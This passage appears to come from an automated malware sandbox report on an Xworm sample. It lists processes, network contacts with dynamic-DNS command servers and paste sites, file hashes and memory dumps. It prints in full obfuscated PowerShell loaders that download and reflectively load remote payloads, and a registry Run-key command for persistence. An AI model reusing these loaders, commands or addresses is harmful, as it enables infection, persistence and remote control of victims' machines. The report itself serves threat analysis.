'<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wenyamnvh/lc.sayojrevelc//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado'))}}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ovaloid = 1;$Pengestrkes='ring';$Mekhitarist198='S';Function Placque($Ansigtsformens){$Bantamweight=$Ansigtsformens.Length-$Ovaloid;$Sowel=$Mekhitarist198+'ubst'+$Pengestrkes;For( $Frizzle=2;$Frizzle -lt $Bantamweight;$Frizzle+=3){$Outgarment+=$Ansigtsformens.$Sowel.Invoke( $Frizzle, $Ovaloid);}$Outgarment;}function Quatrible($Pusheres){ . ($Phenylene) ($Pusheres);}$Extense=Placque 'PhMBroDiz SiBalMalGraDo/ a5 K.Kk0Te ,a(SwW JiChnU,dGeo .wBas t gNNrTM. Ve1 F0D.. U0.o;In CoW riPrnSt6O.4A.;sl U.xR,6 U4Po; . Ar evra:He1Gu2Sp1,o.Ve0Mi)Lo tjGBieSac,uk toPm/ T2 S0 o1Bi0 .0 C1,u0Li1 u .FC iForBue bfUdoMax C/ t1Pi2 C1 t. e0Po ';$Cigartndere=Placque 'CaU As aemerMo-DaApagLaeHan at , ';$Unilaterale=Placque 'A,h,etFit CpBas .: e/ o/ an SzScaHar oi a.a.SpoElrP gOu/ Bs ,xCi/AzO,yvToaSpr iKaoKisF.tNioRemHiyR . HcV sTuvS ';$Forsgscentret=Placque 'Be> P ';$Phenylene=Placque 'S,i ,eM.xGe ';$Passionfruit='Dismes';$synanons = Placque 'Fre ic eh Ho,e r% Paf.pAlpO,d maUdtUdaG %No\H KdydN,fBoaF.rStsT,2N.1Ud1Vi.ExA Pr DbGr Aa& L&Tn TeTrcSth,aoSe FotBa ';Quatrible (Placque 'Ge$pogStl AoAlb .aFolFe:DiNK y Thd.eRudTasChfGooglrKvm SiSudUblN.iIsnT,gW e rNynTaePo=b (S.c,hmNadIm Va/SecPr Ko$.rsJ y,in UaTonAno.rnBus G)F, ');Quatrible (Placque 'Un$.sg.pl no b Rar l n: Af.arBiePse,al Ha nBrcKieS.jBro ru Mrkansta ,lGai ksPrtvie KrRa= U$veUrenBai.il laTot Ae IrBeaGalAred..,tsH pHolPhiSdtBi(S $,aFamoAurVes UgStsboc eGenJatUnr Ae.ytH,) r ');Quatrible (Placque ' T[T.N Uet.tWv.TrSA.eThrTavInilucCoeQuPIno IiH,nCot MCaa enPraRegAfeStr J]N,:Ca:HiSJ,e ,c UuRer,hiByt.ly.oP.arDeoPrtK,o cK.oAklKv .k=,o F[C.NBreEntHa.TsSEde DcU,u arChiBytChyyePLir to,lt.roHacInoColBeTSeySap,xeD,]Ej:In:SoT Rl s.k1Bo2Gr ');$Unilaterale=$freelancejournalister[0];$pneumatocyst= (Placque 'Pa$BagTrlB.oF b ga ,lTe:.eH io .r TmB,oSpgReo ynUna l eTusFr= NH,eN w e- jODobKajUne CcFetP, .yS Uy.fsEmt BeBomM.. LNCle PtB . GWUde abFaC LlSkiBaeLan Kt');$pneumatocyst+=$Nyhedsformidlingerne[1];Quatrible ($pneumatocyst);Quatrible (Placque 'Br$ SHH oA r.rmWeoUtgPuog.n ,aZ lCue Ss,k.KoHGyeSmaBed HeForEksEs[ P$ChC .iHogA,a ur WtP,nCydI.eM,rLiesk]Gr= J$.eEAqx DtcueSinPesEceA ');$Vitriners=Placque '.i$ .HN.o ArAbmSpo,rgA.o MnBeaS,l KeK sSa.MeDTwo ewBen el EoRaa d.eF,oiP lVae .(Ep$HiU .nFoiFulTiaFutC e .r SaD,lSaeG ,Co$t.M aoB,nL.d ungai tKueP tVe),s ';$Mondnitet=$Nyhedsformidlingerne[0];Quatrible (Placque 'St$BagB.lReoAub Ra Sl,l:SkS .yTos it FeGemTyi .sVie HrBi= (A T KeDes ctHo-KvPAlaOrtMeh.n Vo$P M.ooMinakdBln,aiG t,aeLyt.r)Ap ');while (!$Systemiser) {Quatrible (Placque ' O$stgPelShoknb aBel i:CoRw,aUnpCos uo Dd MiSpeKar E=Ud$ Rt srKouHoeUr ') ;Quatrible $Vitriners;Quatrible (Placque 'F,S.ct SaMer.ctP.-.aSA lKoeK,eP,p V Na4di ');Quatrible (Placque 'Th$ hgfalF oUdbb,aP,lAl:FiSSty.hs EtT,e ,m oiQ s JeBerTr=Ri(ErTk,eCosgetPa-KeP.ua.nt MhF. .$NeM aoHenUdd UnFaiCltW,e Ot.r) I ') ;Quatrible (Placque 'Ve$Prg.ulSaoRyb.iaOvlD :AlDBre cvei BmenaTel lt ta Eb Eu.ilP.eCor Ce.anFrdCoe,ys T=.e$h,g .lCooDibFaaRelC,:P.UGrnFod,esCie BeAflCoiUdg FeSi+ N+Fo% $,rflar Me EeDel.eaUnn Ec.de ,j .o .uKlr.lnHoaR.l oi sEctOme.orEf.sucPuoJuuEmnTjtS. ') ;$Unilaterale=$freelancejournalister[$Decimaltabulerendes];}$Stavelsesantallets=321844;$Kopimaskine=26918;Quatrible (Placque '.n$LegKulGro GbRaaBal.a: MSHrk uM,lOvdS,e ,rKosWat,irTroH,ps Mo=Va HuGdeebytSi-.rC,eo ,n,et.beRanu.t r$B.MKyoSanAkdErnaniPat,oe ,t R ');Quatrible (Placque ' .$Blglel,uoDrbHya,pl .:SgTMei ClBehBroF e Vr,xeHi S,=St F [.iS iys.s et ,eMamVu. SCMeo .n AvEne .rUntu ]Co:Gr:FoF,irFuo m PBekaU sBeeMi6La4T.SFotF,r.niWen NgCy( t$PaSBikSnu,flQ.dHyeS rHesuntGrrSpoFepPr) c ');Quatrible (Placque ' y$AfgArlOmoStb.oaM l S:NeB aeQus at,ri FaStlC,sFl1fr0Bu5Ti Pa= kv[OmSSlyPhs BtAce,am a.FeT .eA.x Rt A.PlEBanEncOvo ,dR.i knSkgPi]Sp:Pa:T A RSS,C LI LII..EnGReeFotj.SovtvirPyi,enfagAk(Pe$ TTDyi lK,hTao FeT rCoeP ) ');Quatrible (Placque 'Me$BagaalF.oFobOcaSllGe:W KFlaDubVaeTalP lCogHjnC,i enDeg.a= R$ uBkre CsPot SiS,aGolRusKo1Te0S,5 P. ns SuRobD s ,t.er,xi SnKig (J.$B,S RtgaaArv,peB l,tsFlerasG a.en,rtInaJ.lRelToe,itArsP,,Ci$ImKNeoCepAbibam.maB,sVakEfi yn,keFo)Ep ');Quatrible $Kabellgning;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kdfars211.Arb && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ovaloid = 1;$Pengestrkes='ring';$Mekhitarist198='S';Function Placque($Ansigtsformens){$Bantamweight=$Ansigtsformens.Length-$Ovaloid;$Sowel=$Mekhitarist198+'ubst'+$Pengestrkes;For( $Frizzle=2;$Frizzle -lt $Bantamweight;$Frizzle+=3){$Outgarment+=$Ansigtsformens.$Sowel.Invoke( $Frizzle, $Ovaloid);}$Outgarment;}function Quatrible($Pusheres){ . ($Phenylene) ($Pusheres);}$Extense=Placque 'PhMBroDiz SiBalMalGraDo/ a5 K.Kk0Te ,a(SwW JiChnU,dGeo .wBas t gNNrTM. Ve1 F0D.. U0.o;In CoW riPrnSt6O.4A.;sl U.xR,6 U4Po; . Ar evra:He1Gu2Sp1,o.Ve0Mi)Lo tjGBieSac,uk toPm/ T2 S0 o1Bi0 .0 C1,u0Li1 u .FC iForBue bfUdoMax C/ t1Pi2 C1 t. e0Po ';$Cigartndere=Placque 'CaU As aemerMo-DaApagLaeHan at , ';$Unilaterale=Placque 'A,h,etFit CpBas .: e/ o/ an SzScaHar oi a.a.SpoElrP gOu/ Bs ,xCi/AzO,yvToaSpr iKaoKisF.tNioRemHiyR . HcV sTuvS ';$Forsgscentret=Placque 'Be> P ';$Phenylene=Placque 'S,i ,eM.xGe ';$Passionfruit='Dismes';$synanons = Placque 'Fre ic eh Ho,e r% Paf.pAlpO,d maUdtUdaG %No\H KdydN,fBoaF.rStsT,2N.1Ud1Vi.ExA Pr DbGr Aa& L&Tn TeTrcSth,aoSe FotBa ';Quatrible (Placque 'Ge$pogStl AoAlb .aFolFe:DiNK y Thd.eRudTasChfGooglrKvm SiSudUblN.iIsnT,gW e rNynTaePo=b (S.c,hmNadIm Va/SecPr Ko$.rsJ y,in UaTonAno.rnBus G)F, ');Quatrible (Placque 'Un$.sg.pl no b Rar l n: Af.arBiePse,al Ha nBrcKieS.jBro ru Mrkansta ,lGai ksPrtvie KrRa= U$veUrenBai.il laTot Ae IrBeaGalAred..,tsH pHolPhiSdtBi(S $,aFamoAurVes UgStsboc eGenJatUnr Ae.ytH,) r ');Quatrible (Placque ' T[T.N Uet.tWv.TrSA.eThrTavInilucCoeQuPIno IiH,nCot MCaa enPraRegAfeStr J]N,:Ca:HiSJ,e ,c UuRer,hiByt.ly.oP.arDeoPrtK,o cK.oAklKv .k=,o F[C.NBreEntHa.TsSEde DcU,u arChiBytChyyePLir to,lt.roHacInoColBeTSeySap,xeD,]Ej:In:SoT Rl s.k1Bo2Gr ');$Unilaterale=$freelancejournalister[0];$pneumatocyst= (Placque 'Pa$BagTrlB.oF b ga ,lTe:.eH io .r TmB,oSpgReo ynUna l eTusFr= NH,eN w e- jODobKajUne CcFetP, .yS Uy.fsEmt BeBomM.. LNCle PtB . GWUde abFaC LlSkiBaeLan Kt');$pneumatocyst+=$Nyhedsformidlingerne[1];Quatrible ($pneumatocyst);Quatrible (Placque 'Br$ SHH oA r.rmWeoUtgPuog.n ,aZ lCue Ss,k.KoHGyeSmaBed HeForEksEs[ P$ChC .iHogA,a ur WtP,nCydI.eM,rLiesk]Gr= J$.eEAqx DtcueSinPesEceA ');$Vitriners=Placque '.i$ .HN.o ArAbmSpo,rgA.o MnBeaS,l KeK sSa.MeDTwo ewBen el EoRaa d.eF,oiP lVae .(Ep$HiU .nFoiFulTiaFutC e .r SaD,lSaeG ,Co$t.M aoB,nL.d ungai tKueP tVe),s ';$Mondnitet=$Nyhedsformidlingerne[0];Quatrible (Placque 'St$BagB.lReoAub Ra Sl,l:SkS .yTos it FeGemTyi .sVie HrBi= (A T KeDes ctHo-KvPAlaOrtMeh.n Vo$P M.ooMinakdBln,aiG t,aeLyt.r)Ap ');while (!$Systemiser) {Quatrible (Placque ' O$stgPelShoknb aBel i:CoRw,aUnpCos uo Dd MiSpeKar E=Ud$ Rt srKouHoeUr ') ;Quatrible $Vitriners;Quatrible (Placque 'F,S.ct SaMer.ctP.-.aSA lKoeK,eP,p V Na4di ');Quatrible (Placque 'Th$ hgfalF oUdbb,aP,lAl:FiSSty.hs EtT,e ,m oiQ s JeBerTr=Ri(ErTk,eCosgetPa-KeP.ua.nt MhF. .$NeM aoHenUdd UnFaiCltW,e Ot.r) I ') ;Quatrible (Placque 'Ve$Prg.ulSaoRyb.iaOvlD :AlDBre cvei BmenaTel lt ta Eb Eu.ilP.eCor Ce.anFrdCoe,ys T=.e$h,g .lCooDibFaaRelC,:P.UGrnFod,esCie BeAflCoiUdg FeSi+ N+Fo% $,rflar Me EeDel.eaUnn Ec.de ,j .o .uKlr.lnHoaR.l oi sEctOme.orEf.sucPuoJuuEmnTjtS. ') ;$Unilaterale=$freelancejournalister[$Decimaltabulerendes];}$Stavelsesantallets=321844;$Kopimaskine=26918;Quatrible (Placque '.n$LegKulGro GbRaaBal.a: MSHrk uM,lOvdS,e ,rKosWat,irTroH,ps Mo=Va HuGdeebytSi-.rC,eo ,n,et.beRanu.t r$B.MKyoSanAkdErnaniPat,oe ,t R ');Quatrible (Placque ' .$Blglel,uoDrbHya,pl .:SgTMei ClBehBroF e Vr,xeHi S,=St F [.iS iys.s et ,eMamVu. SCMeo .n AvEne .rUntu ]Co:Gr:FoF,irFuo m PBekaU sBeeMi6La4T.SFotF,r.niWen NgCy( t$PaSBikSnu,flQ.dHyeS rHesuntGrrSpoFepPr) c ');Quatrible (Placque ' y$AfgArlOmoStb.oaM l S:NeB aeQus at,ri FaStlC,sFl1fr0Bu5Ti Pa= kv[OmSSlyPhs BtAce,am a.FeT .eA.x Rt A.PlEBanEncOvo ,dR.i knSkgPi]Sp:Pa:T A RSS,C LI LII..EnGReeFotj.SovtvirPyi,enfagAk(Pe$ TTDyi lK,hTao FeT rCoeP ) ');Quatrible (Placque 'Me$BagaalF.oFobOcaSllGe:W KFlaDubVaeTalP lCogHjnC,i enDeg.a= R$ uBkre CsPot SiS,aGolRusKo1Te0S,5 P. ns SuRobD s ,t.er,xi SnKig (J.$B,S RtgaaArv,peB l,tsFlerasG a.en,rtInaJ.lRelToe,itArsP,,Ci$ImKNeoCepAbibam.maB,sVakEfi yn,keFo)Ep ');Quatrible $Kabellgning;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kdfars211.Arb && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Datakopierings" /t REG_EXPAND_SZ /d "%Revolutionary% -w 1 $Nonetheless=(Get-ItemProperty -Path 'HKCU:\Cornaceous\').Gonid;%Revolutionary% ($Nonetheless)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Datakopierings" /t REG_EXPAND_SZ /d "%Revolutionary% -w 1 $Nonetheless=(Get-ItemProperty -Path 'HKCU:\Cornaceous\').Gonid;%Revolutionary% ($Nonetheless)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 12.221.146.138:9402 | june9402xw.duckdns.org | tcp |
| US | 8.8.8.8:53 | 138.146.221.12.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 200.187.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uploaddeimagens.com.br | udp |
| US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp |
| US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp |
| US | 8.8.8.8:53 | 138.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cleverjoyas.cl | udp |
| US | 204.11.59.34:443 | cleverjoyas.cl | tcp |
| US | 8.8.8.8:53 | 34.59.11.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hvn8500newmay.duckdns.org | udp |
| US | 12.221.146.138:8500 | hvn8500newmay.duckdns.org | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nzaria.org | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | 17.154.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| AU | 185.184.154.17:443 | nzaria.org | tcp |
| US | 8.8.8.8:53 | 32.25.90.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.101.63.23.in-addr.arpa | udp |
Files
memory/380-0-0x00007FFD9A2E3000-0x00007FFD9A2E4000-memory.dmp
memory/380-1-0x0000000000A90000-0x0000000000A9E000-memory.dmp
memory/380-2-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\zxwuch.vbe
| MD5 | 8ec786faaa5a362811fd1619b154491a |
| SHA1 | 71bb2855f0a7310e03a314d36bee6834a4a1e0bd |
| SHA256 | a0db4681c448441398ef9c2ed196614fa9a6cbcf88292b865282d0e1cc787554 |
| SHA512 | a6d184f84b4edcb2689f69bf409e837919bac747e4dae083b54df6cc58aa4e28732cc667667b73bd85155c97b7f9247fe423cdf412d5fd4fb917857cdbe171cf |
C:\Users\Admin\AppData\Local\Temp\kaqlax.js
| MD5 | 328765aecc6d2133216750c1b177bb47 |
| SHA1 | 078149068c875b447f6d936255716e02deef08a3 |
| SHA256 | e8ea76d1543e92d8cf8446332af71ae00ffb86f15aaf22aaf5c8d3ba39e915fc |
| SHA512 | 11373f2da96edee3e0de2d9f202564a5ae2636b4555cab3d3ad2d54aeccbf20e7e2104039087a4566439a85772a9c714adc6683c5094b70d658e8f93db0e44c5 |
C:\Users\Admin\AppData\Local\Temp\ucaxju.vbs
| MD5 | 44cc7d8bb2eaa90cb7ebfe43745bf6bf |
| SHA1 | 8a8624f10c91710ddfb562816c08f4bdb86444fb |
| SHA256 | 7a23828abf2a8e261bb2ed2575f4034941524d032968f96e06e18200898202fd |
| SHA512 | 431458777fc04012c65f5282f7f5da59441ac6753f6c791051183991169cbeed34caa22bd7fde10b975db54c29fd7173e68b08414d1893e03952a2953efe289e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | 1bfe591a4fe3d91b03cdf26eaacd8f89 |
| SHA1 | 719c37c320f518ac168c86723724891950911cea |
| SHA256 | 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8 |
| SHA512 | 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | 67c140c754783d577aae499645f84fb2 |
| SHA1 | 02d279343933eb803954ffca4cd48d014e097509 |
| SHA256 | 6f67d4ffe1403deab691b9635bff507ded0eeb0fa38d43ef2e66df49926bd7cd |
| SHA512 | 992a8767c93729b2e2d11b1c39bb798a07a5a247014855be77ead4488c743519b32d77bb2085883c2ac222fb56f3595a4a873135de6d6fb1128d416d81e7d7d3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | a08991b3b3149042115bebb75a76ccc0 |
| SHA1 | 4f1a11c57b43422713fcb9c7af450a3a547ad11d |
| SHA256 | 827224a17beecdd911e49e0f09ab9665246f781744d1241545d6aefe2e67c788 |
| SHA512 | dc3f8319b0a7ab3e3a37447cdd60b3772bbb5e73cd44e9e58c2ad979dcd68f48f675c8a0a2626e9d3af5d4c664a9dcc52b786b69946236d8f89d12371d987fac |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 10f32347608f10e896243906f203e1b3 |
| SHA1 | 199be0e5efb3f3cf85d373c5c0edb1522d8b88f9 |
| SHA256 | 4afa3487458abd802ec94de28cf44a739398ae1992618d0907ed8d2b72104f8d |
| SHA512 | 7f53005a872b2ff3f992320dcf079b51044f0360d6f16bfc29ea8e9d7cd995938c2468b1b12ce10297f94d923aef070af323e6c60a3d7ad11d9f4e2653919e48 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | b30e434dd5361c62ff6a818a96b3007c |
| SHA1 | 9032a5e81f190d5be24f6b233ba0bbc3bd788b92 |
| SHA256 | 55c7ed110be3aa6886150e1a902544486762e8769945efe7b2c1ad312bc73b8a |
| SHA512 | e99c0e9add91529d91547f8ca2f434a51fad11587dce4dbb44b150b19b586812e0f97852b54494f2faf07cf771abc009981829c19c23833a07f7c21a761df1f3 |
memory/5064-41-0x000001922C640000-0x000001922C662000-memory.dmp
memory/5064-45-0x000001922C950000-0x000001922C9C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ewypouew.qpq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 32eaf4d20471bf191944bc3dc862caa0 |
| SHA1 | a2c74289aa6e35abcc8618b84dfe8f90a994430c |
| SHA256 | 70475052f8acb4358d53b32628b6b18df1d5aa4f3191cde9f1c0aecfad361c2b |
| SHA512 | b55fff04311684200a359e19be162d7031f34f63a9d17c6b10e54b89c948c7efd66ce62398def1d3949379df46b001007305958f286b3757d8a2c707173cec6e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d737fc27bbf2f3bd19d1706af83dbe3f |
| SHA1 | 212d219394124968b50769c371121a577d973985 |
| SHA256 | b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982 |
| SHA512 | 974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b |
memory/4012-127-0x0000017EFB340000-0x0000017EFB52E000-memory.dmp
memory/3328-162-0x0000000000400000-0x0000000000474000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0e73807456424492408ea45841692fc6 |
| SHA1 | f0f64db257ce403de2d95498eaf1774c1a2c70e9 |
| SHA256 | 630535184f9a08f02d0e81422a9cea47df8f0f788f95459cfa9bf9531cb0b5b1 |
| SHA512 | 107535a4df79b89be4e1f299fb2df9178934f0b0fdfb8929d640b0ef8c3076c501e0502602db4199e4605959a5a18df2d8010eb956c0bc5832eea095719960fa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b159dcdcf3ffefe248fb866ecb98fcc8 |
| SHA1 | 5d1b56f9a0fc2ee02bb2dcfd4e6b8a4945afee08 |
| SHA256 | 158dc5dbbadbeb02ea37acda6017f2a1f054e66092637ccf27be8529e3b692c9 |
| SHA512 | 49d6952b0bc66ea86856f25bbbffd4377c6cd82e532ea30d1e5762b09e0bdfbb8dad8e37dfba26406a4454f11ada9290feddf07e9d91abc7c923240cc247db21 |
memory/3328-171-0x00000000052A0000-0x000000000537C000-memory.dmp
memory/3328-197-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-172-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-175-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-233-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-231-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-230-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-227-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-225-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-224-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-221-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-219-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-218-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-215-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-213-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-211-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-209-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-207-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-205-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-203-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-201-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-199-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-195-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-193-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-192-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-189-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-187-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-185-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-183-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-181-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-179-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-177-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-173-0x00000000052A0000-0x0000000005377000-memory.dmp
memory/3328-6484-0x00000000053F0000-0x0000000005456000-memory.dmp
memory/380-6485-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp
memory/3988-6517-0x0000000004D20000-0x0000000004D56000-memory.dmp
memory/3988-6518-0x0000000007B70000-0x0000000008198000-memory.dmp
memory/3988-6519-0x0000000007670000-0x0000000007692000-memory.dmp
memory/3988-6520-0x00000000078F0000-0x0000000007956000-memory.dmp
memory/3988-6521-0x00000000082A0000-0x00000000085F0000-memory.dmp
memory/3988-6522-0x0000000007980000-0x000000000799C000-memory.dmp
memory/3988-6523-0x00000000089B0000-0x00000000089FB000-memory.dmp
memory/3988-6524-0x00000000087F0000-0x0000000008866000-memory.dmp
memory/3988-6539-0x0000000009F50000-0x000000000A5C8000-memory.dmp
memory/3988-6540-0x00000000096A0000-0x00000000096BA000-memory.dmp
memory/3988-6545-0x0000000009A20000-0x0000000009AB4000-memory.dmp
memory/3988-6546-0x0000000009980000-0x00000000099A2000-memory.dmp
memory/3988-6547-0x000000000AAD0000-0x000000000AFCE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Kdfars211.Arb
| MD5 | ce88060ebdeccc770bc89dc05d8215c6 |
| SHA1 | 98506225f9ce90bc392a68af9892578d45141ffe |
| SHA256 | d502c8f727cc36b86146bf4085fa16adfb82ad1ffe769da1d6086613f6eccd77 |
| SHA512 | 19d8a352f868b9ed8f71d800f3e256594d30c94eeae54afb2f96434810b117af07178f945e735e9f3d16562ecf07827597250f1e1281df3483509214ed1c75d9 |
memory/198380-773078-0x0000000003000000-0x0000000003074000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-13 21:22
Reported
2024-06-13 22:33
Platform
win10v2004-20240508-en
Max time kernel
1784s
Max time network
1794s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\junexw.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\junexw.exe
"C:\Users\Admin\AppData\Local\Temp\junexw.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
| US | 8.8.8.8:53 | june9402xw.duckdns.org | udp |
